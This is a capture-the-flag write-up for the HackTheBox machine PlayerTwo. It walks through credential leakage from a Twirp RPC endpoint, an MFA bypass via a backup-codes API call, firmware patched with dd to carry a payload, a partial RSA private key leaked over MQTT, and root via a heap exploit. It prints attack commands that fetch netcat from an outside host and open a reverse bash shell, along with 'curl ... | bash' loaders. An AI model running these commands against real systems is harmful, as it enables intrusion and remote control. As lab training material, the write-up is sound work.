PlayerTwo is one of the machines currently available on the HackTheBox hacking platform and is rated Insane.
In this case it is a machine based on the Linux operating system.
Port scanning
As usual, we add the PlayerTwo machine's IP, 10.10.10.170, to /etc/hosts as playertwo.htb and start with the nmap port scan.
```
# Nmap 7.80 scan initiated Thu Jun  4 14:06:27 2020 as: nmap -sV -Pn -p- -sC -oA playertwo 10.10.10.170
Nmap scan report for playertwo.htb (10.10.10.170)
Host is up (0.050s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0e:7b:11:2c:5e:61:04:6b:e8:1c:bb:47:b8:4d:fe:5a (RSA)
|   256 18:a0:87:56:64:06:17:56:4d:6a:8c:79:4b:61:56:90 (ECDSA)
|_  256 b6:4b:fc:e9:62:08:5a:60:e0:43:69:af:29:b3:27:14 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8545/tcp open  http    (PHP 7.2.24-0ubuntu0.18.04.1)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Thu, 04 Jun 2020 12:09:00 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path \"\/nice%20ports%2C\/Tri%6Eity.txt%2ebak\"","meta":{"twirp_invalid_route":"GET \/nice%20ports%2C\/Tri%6Eity.txt%2ebak"}}
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Thu, 04 Jun 2020 12:08:51 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path \"\/\"","meta":{"twirp_invalid_route":"GET \/"}}
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Date: Thu, 04 Jun 2020 12:08:51 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path \"\/\"","meta":{"twirp_invalid_route":"OPTIONS \/"}}
|   OfficeScan: 
|     HTTP/1.1 404 Not Found
|     Date: Thu, 04 Jun 2020 12:09:00 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|_    {"code":"bad_route","msg":"no handler for path \"\/\"","meta":{"twirp_invalid_route":"GET \/"}}
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8545-TCP:V=7.80%I=7%D=6/4%Time=5ED8E3F9%P=x86_64-pc-linux-gnu%r(Get
SF:Request,FC,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Thu,\x2004\x20
SF:Jun\x202020\x2012:08:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:
SF:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20application/js
SF:on\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20for\x20pat
SF:h\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/\"}}")
SF:%r(HTTPOptions,100,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Thu,\x
SF:2004\x20Jun\x202020\x2012:08:51\x20GMT\r\nConnection:\x20close\r\nX-Pow
SF:ered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20applic
SF:ation/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20fo
SF:r\x20path\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"OPTIONS\
SF:x20\\/\"}}")%r(FourOhFourRequest,144,"HTTP/1\.1\x20404\x20Not\x20Found\
SF:r\nDate:\x20Thu,\x2004\x20Jun\x202020\x2012:09:00\x20GMT\r\nConnection:
SF:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nConte
SF:nt-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"n
SF:o\x20handler\x20for\x20path\x20\\\"\\/nice%20ports%2C\\/Tri%6Eity\.txt%
SF:2ebak\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/nice%20ports%
SF:2C\\/Tri%6Eity\.txt%2ebak\"}}")%r(OfficeScan,FC,"HTTP/1\.1\x20404\x20No
SF:t\x20Found\r\nDate:\x20Thu,\x2004\x20Jun\x202020\x2012:09:00\x20GMT\r\n
SF:Connection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\
SF:.1\r\nContent-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\",
SF:\"msg\":\"no\x20handler\x20for\x20path\x20\\\"\\/\\\"\",\"meta\":{\"twi
SF:rp_invalid_route\":\"GET\x20\\/\"}}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun  4 14:07:32 2020 -- 1 IP address (1 host up) scanned in 65.13 seconds
```
With the first scan done, we move on to enumerating the discovered services.
Enumeration
We start with port 80, which returns an error when we access it, so next we add the name player2.htb to our hosts file pointing at the machine's IP and access the web portal, which looks like this:
Reviewing the source code, we find yet another domain for the machine, so we add it to /etc/hosts as well:
```
10.10.10.170 product.player2.htb
```
We go through the portal in depth but cannot make progress, so we look into the other open port, 8545, where we get the following error on access:
```json
{"code":"bad_route","msg":"no handler for path \"\/\"","meta":{"twirp_invalid_route":"GET \/"}}
```
This is Twirp, a simple RPC framework, and with Google's help we find the following document, which gives more information on how it works:
https://github.com/twitchtv/twirp/blob/master/docs/routing.md
Given the information in that link, we need to find the .proto file, which describes the service, so we use wfuzz to try to locate it.
We try several wordlists until we hit the right one and obtain the generated.proto file at http://player2.htb/proto/generated.proto, with the following content:
```proto
syntax = "proto3";

package twirp.player2.auth;
option go_package = "auth";

service Auth {
  rpc GenCreds(Number) returns (Creds);
}

message Number {
  int32 count = 1; // must be > 0
}

message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;
}
```
So with the data found we build the curl request using the following syntax:
```
POST /twirp/<package>.<Service>/<Method>
```
After several attempts we end up obtaining a list of users with their passwords:
```
$ curl -X POST http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds --header "Content-Type:application/json" --data '{}'
{"name":"snowscan","pass":"XHq7_WJTA?QD_?E2"}
{"name":"jkr","pass":"Lp-+Q8umLW5*7qkc"}
{"name":"0xdf","pass":"ze+EKe-SGF^5uZQX"}
{"name":"mprox","pass":"ze+EKe-SGF^5uZQX"}
{"name":"mprox","pass":"XHq7_WJTA?QD_?E2"}
{"name":"jkr","pass":"XHq7_WJTA?QD_?E2"}
{"name":"jkr","pass":"tR@dQnwnZEk95*6#"}
{"name":"jkr","pass":"ze+EKe-SGF^5uZQX"}
{"name":"snowscan","pass":"XHq7_WJTA?QD_?E2"}
{"name":"0xdf","pass":"Lp-+Q8umLW5*7qkc"}
```
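As an added example (not code from the writeup), the following Python script applies Twirp's routing rule to the recovered generated.proto: it derives the route used in the curl above, builds a JSON request skeleton from the request message, and flags methods whose response carries a password-like field, since Twirp itself performs no authentication and such methods need an auth hook in front of them. The proto text is a re-typed copy of the page's file; the helper names are my own.

```python
import json
import re

# Re-typed copy of the generated.proto the writeup recovered, embedded so the
# example runs offline.
GENERATED_PROTO = """
syntax = "proto3";
package twirp.player2.auth;
option go_package = "auth";
service Auth {
  rpc GenCreds(Number) returns (Creds);
}
message Number {
  int32 count = 1; // must be > 0
}
message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;
}
"""

# proto3 scalar types -> placeholder JSON values for a request skeleton
_JSON_DEFAULTS = {"int32": 0, "int64": 0, "uint32": 0, "uint64": 0,
                  "bool": False, "string": "", "bytes": ""}


def parse_proto(text):
    """Return (package, services, messages) from a minimal proto3 file.

    services: {service_name: [(rpc, request_type, response_type), ...]}
    messages: {message_name: [(field_type, field_name), ...]}
    """
    package = re.search(r"^\s*package\s+([\w.]+)\s*;", text, re.M).group(1)
    services, messages = {}, {}
    for m in re.finditer(r"service\s+(\w+)\s*\{(.*?)\}", text, re.S):
        services[m.group(1)] = re.findall(
            r"rpc\s+(\w+)\s*\(\s*(\w+)\s*\)\s*returns\s*\(\s*(\w+)\s*\)", m.group(2))
    for m in re.finditer(r"message\s+(\w+)\s*\{(.*?)\}", text, re.S):
        body = re.sub(r"//[^\n]*", "", m.group(2))  # drop line comments
        messages[m.group(1)] = re.findall(r"(\w+)\s+(\w+)\s*=\s*\d+\s*;", body)
    return package, services, messages


def twirp_routes(text, prefix="/twirp"):
    """Map every rpc to its Twirp route, POST <prefix>/<package>.<Service>/<Method>,
    paired with a JSON skeleton of the request message so the exposed surface
    can be reviewed field by field."""
    package, services, messages = parse_proto(text)
    routes = {}
    for service, rpcs in services.items():
        for method, req, resp in rpcs:
            body = {name: _JSON_DEFAULTS.get(ftype) for ftype, name in messages.get(req, [])}
            routes[f"{prefix}/{package}.{service}/{method}"] = {
                "request": req, "response": resp, "json_skeleton": json.dumps(body)}
    return routes


def credential_returning_rpcs(text):
    """Flag rpcs whose response message carries a password-like field; these
    must sit behind authentication, which Twirp does not provide by itself."""
    _, services, messages = parse_proto(text)
    return sorted(method for rpcs in services.values() for method, _, resp in rpcs
                  if any(name in ("pass", "password", "secret")
                         for _, name in messages.get(resp, [])))


if __name__ == "__main__":
    for route, info in twirp_routes(GENERATED_PROTO).items():
        print(route, info)
    print("needs auth hook:", credential_returning_rpcs(GENERATED_PROTO))
```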
Next we go to the product.player2.htb URL to try to get past the login form:
We generate a list of users and passwords and carry out the attack, gaining access with the following credentials:
```
jkr:Lp-+Q8umLW5*7qkc
```
But we land on a page with MFA, which blocks our way again:
Checking the existing directories with dirb we discover that the URL /api/totp exists, which will be useful at this step, and reading the text of the 2FA page we learn that we need to obtain the backup codes to continue, so we send a curl request to try to obtain that token:
```
$ curl -X POST http://product.player2.htb/api/totp --data '{"action":"backup_codes"}' --header "Content-Type:application/json" --cookie "PHPSESSID=9qqsnjahii4d5142ac6e5b0isr"
{"user":"jkr","code":"29389234823423"}
```
Once we have it, we can skip this step and get past the login:
This page talks about a service designed for games, where we find, among other things, the following text:
```
Please read our documentation here to understand and work with our new protocol Protobs.
We also coming up with a Responsible Vulnerable Disclosure Program in the future to understand more issues in our development cycle. Stay tuned for the updates.
```
Along with a link to a PDF file, in which we see two more things: a .tar file and a file upload page.
We extract the .tar file and find the following files:
```
$ tar -tvf protobs_firmware_v1.0.tar -C protobs_firmware_v1.0/
-rw-r--r-- root/root      1245 2019-12-01 04:12 info.txt
-rw-r--r-- root/root     17264 2019-12-01 08:27 Protobs.bin
-rw-r--r-- root/root        35 2019-12-01 04:25 version
```
In info.txt and version we find nothing interesting, so we move on to the binary and analyse it, in our case with radare2.
In it we find a function that calls another one with a string, which may well be the way to get past this step:
Searching Google, we find a post on Stack Overflow explaining how to patch a binary file with dd, so we go for it.
First we need to find the string in the binary:
```
$ strings -t d Protobs.bin | grep stty
   8420 stty raw -echo min 0 time 10
   8449 stty sane
```
We create a file, called s in our case, that uploads nc to the machine and runs it to get our reverse shell, with the following content:
```
curl http://10.10.14.26/nc -o /tmp/nc
chmod +x /tmp/nc
/tmp/nc -e /bin/bash 10.10.14.26 4444
```
Then we create a file called shell, which downloads the previous file, with the following content:
```
curl 10.10.14.26/s | bash
```
With that done, all that remains is to patch the binary with dd:
```
$ dd if=shell of=Protobs.bin obs=1 seek=8420 conv=notrunc
0+1 registros leídos
33+0 registros escritos
33 bytes copied, 0,013608 s, 2,4 kB/s
```
Once the binary is patched, we rebuild the .tar with info.txt, version and our patched binary and upload it to the portal; after several alerts:
we get it verified, signed and executed, thereby obtaining a shell as www-data on our listener:
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from playertwo.htb [10.10.10.170] 43488
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
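The upload flow above signs and runs whatever firmware arrives, which is why a binary patched with dd at a string offset goes straight to execution. As an added example (not the machine's code), here is the verify-before-execute order a firmware endpoint should follow: the vendor ships a signed manifest of per-member digests, and the server checks the manifest signature and every tar member against it before anything is signed or run. The tar contents, the vendor key and the HMAC-based manifest signature are all constructed for this example (a real vendor would use an asymmetric signature).

```python
import hashlib
import hmac
import io
import json
import tarfile

# Constructed stand-ins for the three members of protobs_firmware_v1.0.tar;
# the key and the firmware bytes are invented for this example.
VENDOR_KEY = b"example-vendor-signing-key"  # assumption: secret held by the vendor only
FIRMWARE = {
    "info.txt": b"Protobs firmware\n",
    "version": b"1.0\n",
    "Protobs.bin": b"\x7fELF" + b"\x00" * 64
                   + b"stty raw -echo min 0 time 10\x00" + b"stty sane\x00",
}


def build_tar(members):
    """Pack {name: bytes} into an in-memory tar archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sign_manifest(members, key):
    """Vendor side: per-member SHA-256 digests plus an HMAC over the canonical manifest."""
    manifest = {n: hashlib.sha256(d).hexdigest() for n, d in sorted(members.items())}
    canon = json.dumps(manifest, sort_keys=True).encode()
    return manifest, hmac.new(key, canon, hashlib.sha256).hexdigest()


def verify_firmware(tar_bytes, manifest, signature, key):
    """Server side: verify BEFORE signing or executing. Returns (ok, reason).
    Every member must be listed and match the manifest; no extras are allowed."""
    canon = json.dumps(manifest, sort_keys=True).encode()
    expected = hmac.new(key, canon, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signature):
        return False, "manifest signature invalid"
    seen = set()
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile() or member.name not in manifest:
                return False, f"unexpected member {member.name}"
            digest = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
            if not hmac.compare_digest(digest, manifest[member.name]):
                return False, f"digest mismatch for {member.name}"
            seen.add(member.name)
    missing = sorted(set(manifest) - seen)
    return (False, f"missing members {missing}") if missing else (True, "ok")


def patch_at_offset(data, offset, payload):
    """Mimic `dd conv=notrunc seek=<offset>`: overwrite bytes in place, same length."""
    return data[:offset] + payload + data[offset + len(payload):]


if __name__ == "__main__":
    manifest, sig = sign_manifest(FIRMWARE, VENDOR_KEY)
    print(verify_firmware(build_tar(FIRMWARE), manifest, sig, VENDOR_KEY))
    off = FIRMWARE["Protobs.bin"].index(b"stty raw")
    tampered = dict(FIRMWARE)
    tampered["Protobs.bin"] = patch_at_offset(FIRMWARE["Protobs.bin"], off, b"echo patched")
    print(verify_firmware(build_tar(tampered), manifest, sig, VENDOR_KEY))
```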
At this point we start enumerating the existing users and processes and find a very interesting one called mosquitto:
```
mosquit+  1143  0.0  0.3  48024  5880 ?        S    15:52   0:00 /usr/sbin/mosquitto -c /etc/mosquitto/mosquitto.conf
```
Mosquitto is an open-source message broker that implements the MQTT protocol, and we can use it to escalate privileges as described in the following post:
https://blog.teserakt.io/2019/02/25/securing-the-mosquitto-mqtt-broker/
So we run the following command to try to discover more information about the system:
```
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#'
```
And as it happens, in its output we obtain an SSH key:
```
$SYS/broker/version mosquitto version 1.4.15
$SYS/broker/timestamp Tue, 18 Jun 2019 11:42:22 -0300
$SYS/broker/uptime 803 seconds
$SYS/broker/clients/total 8
$SYS/broker/clients/maximum 10
[... $SYS/broker/* load and message statistics omitted ...]
$SYS/broker/publish/bytes/sent 27640
$SYS/internal/firmware/signing Retrieving the key from aws instance
$SYS/internal/firmware/signing Key retrieved..
$SYS/internal/firmware/signing -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7Gc/OjpFFvefFrbuO64wF8sNMy+/7miymSZsEI+y4pQyEUBA
R0JyfLk8f0SoriYk0clR/JmY+4mK0s7+FtPcmsvYgReiqmgESc/brt3hDGBuVUr4
...
zxQNDwKBgQCBOLY8aLyv/Hi0l1Ve8Fur5bLQ4BwimY3TsJTFFwU4IDFQY78AczkK
/1i6dn3iKSmL75aVKgQ5pJHkPYiTWTRq2a/y8g/leCrvPDM19KB5Zr0Z1tCw5XCz
iZHQGq04r9PMTAFTmaQfMzDy1Hfo8kZ/2y5+2+lC7wIlFMyYze8n8g==
-----END RSA PRIVATE KEY-----
$SYS/broker/uptime 858 seconds
$SYS/broker/clients/total 11
$SYS/broker/clients/maximum 11
$SYS/broker/clients/active 3
$SYS/broker/clients/connected 3
[... further $SYS/broker/load/* statistics omitted ...]
```
Getting the user flag
With the SSH key obtained, we try the users found in /etc/passwd and manage to log in to the machine as observer:
```
ssh -i /home/asdf/.ssh/player2observer.pem observer@10.10.10.170
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.2.5-050205-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun  4 16:09:01 UTC 2020

  System load:  0.0                Processes:            179
  Usage of /:   26.1% of 19.56GB   Users logged in:      0
  Memory usage: 26%                IP address for ens33: 10.10.10.170
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

121 packages can be updated.
5 updates are security updates.

Last login: Sun Dec  1 15:33:19 2019 from 172.16.118.129
observer@player2:~$ whoami
observer
observer@player2:~$ id
uid=1000(observer) gid=1000(observer) groups=1000(observer)
observer@player2:~$ 
observer@player2:~$ ls -l
total 8
drwxr-x--- 2 observer observer 4096 Dec 17 10:47 Development
-r-------- 1 observer observer   33 Sep  5  2019 user.txt
observer@player2:~$ 
```
And we get the user flag; this machine is proving tough, and we still have half of it left.
Privilege escalation
At this point we enumerate again to see whether we can find anything useful on this machine, and we come across some interesting files at /opt/Configuration_Utility.
We download those files and use the patchelf utility so the binary uses our system's libraries instead of the ones bundled with it:
```
patchelf Protobs --set-interpreter /lib64/ld-linux-x86-64.so.2
patchelf Protobs --remove-rpath /lib/x86_64-linux-gnu/
```
We reverse the binary with Ghidra to recover its code and understand what it really does.
Once this part is analysed and the vulnerabilities identified, we write our own exploit in Python and run it:
```
python exploit.py
[+] Binaries info
[*] '/data/ctf/htb/machines/todo/playertwo.htb/files/privesc/Protobs'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fd000)
[*] '/data/ctf/htb/machines/todo/playertwo.htb/files/privesc/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Connecting...
[+] Connecting to player2.htb on port 22: Done
[*] observer@player2.htb:
    Distro    Ubuntu 18.04
    OS:       linux
    Arch:     amd64
    Version:  5.2.5
    ASLR:     Enabled
[*] Working directory: '/opt/Configuration_Utility'
[+] Starting remote process './Protobs' on player2.htb: pid 6273
[+] Starting attack...
[+] Heap Leak: 0xaf92e0
[+] Libc Base: 0x7fe3510bd000
[*] Switching to interactive mode
$ id
uid=1000(observer) gid=1000(observer) euid=0(root) groups=1000(observer)
# $ whoami
root
```
Getting root after a few minutes.
Getting the root flag
Once in as root, all that remains is to go to its home directory and get the flag:
```
# $ whoami
root
# $ cd /root
# $ ls -l
total 12
-rwx------ 1 root root 819 Nov 10  2019 broadcast.py
-rwx------ 1 root root 905 Sep 13  2019 connection.py
-r-------- 1 root root  33 Sep  5  2019 root.txt
# $ cat root.txt
73DAXXXXXXXXXXXXXXXXXXXXXXXX8C5
# $ 
```
And we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link https://www.hackthebox.eu/home/users/profile/103792